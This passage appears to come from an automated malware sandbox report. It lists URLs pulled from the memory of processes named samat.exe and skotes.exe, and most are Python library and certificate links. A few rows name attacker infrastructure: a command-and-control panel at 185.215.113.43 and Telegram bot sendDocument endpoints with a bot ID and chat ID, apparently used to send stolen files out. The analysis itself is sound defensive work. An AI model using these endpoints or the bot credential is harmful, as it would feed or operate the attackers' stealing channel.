https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://importlib-metadata.readthedocs.io/	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/core-metadata/	samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	samat.exe, 00000008.00000003.4503586193.000001BCCC093000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513113910.000001BCCC0B6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3016877538.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509147637.000001BCCC094000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512873377.000001BCCC09D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499785539.000001BCCC06D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502296671.000001BCCC070000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/packaging	samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/pypa/packagingp	samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	false		high
https://readthedocs.org/projects/importlib-metadata/badge/?version=latest	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://refspecs.linuxfoundation.org/elf/gabi4	samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	false		high
https://blog.jaraco.com/skeleton	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de11z	samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpcoded	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc3610	samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/platformdirs/platformdirs	samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crl	samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curl.haxx.se/rfc/cookie_spec.html	samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md	samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;	samat.exe, 00000008.00000003.3008901685.000001BCCC4B6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.accv.es/legislacion_c.htm2	samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pypi.org/project/build/).	samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot8095725853/senddocument?chat_id=7027613045%3aaagx3rpo-1uhb195if6jixakjyp	samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/0m	samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/wheel	samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/dev/peps/pep-0427/	samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018678721.000001BCCC7CF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526403156.000001BCCC46C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507302414.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518851615.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512558074.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp	false		high
http://passport.net/tb	svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml0	samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp	false		high
https://img.shields.io/badge/skeleton-2024-informational	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the	samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532440818.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530927299.000001BCCC7FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559196622.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76	samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563998531.000001BCCD441000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/417#issuecomment-392298401	samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crl	samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpded	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.cert.fnmt.es/dpcs/	samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/mail	samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/pypi/v/importlib_metadata.svg	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jaraco/jaraco.functools/issues/5	samat.exe, 00000008.00000002.4561955068.000001BCCCD00000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.accv.es00	samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot8095725853/sendDocument?chat_id=7027613045%3AAAGX3rPO-1UHB195if6JIXakjYP	samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560489792.000001BCCC97E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527191112.000001BCCC8B7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	samat.exe, 00000008.00000003.4527003356.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509758777.000001BCCC85C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC85E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC85F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.firmaprofesional.com/cps0	samat.exe, 00000008.00000003.4519025828.000001BCCD377000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514877809.000001BCCD360000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0685/Pp	samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2920	samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/SGCA.crl0	samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php5	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22	samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php7	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php8	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php=	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadisglobal.com/cps0	samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpA	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.accv.esS	samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/SGCA.crlW	samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6455#section-5.2	samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml	samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php$	skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://docs.python.org/library/itertools.html#recipes	samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot8095725853/sendDocument	samat.exe, 00000008.00000002.4565677561.000001BCCDE58000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.cert.fnmt.es/dpcs/t	samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca	samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pypi.org/project/setuptools/	samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/1024.	samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	false		high
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503522230.000001BCCC829000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503045992.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508302537.000001BCCC49D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500627948.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508607336.000001BCCC82A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 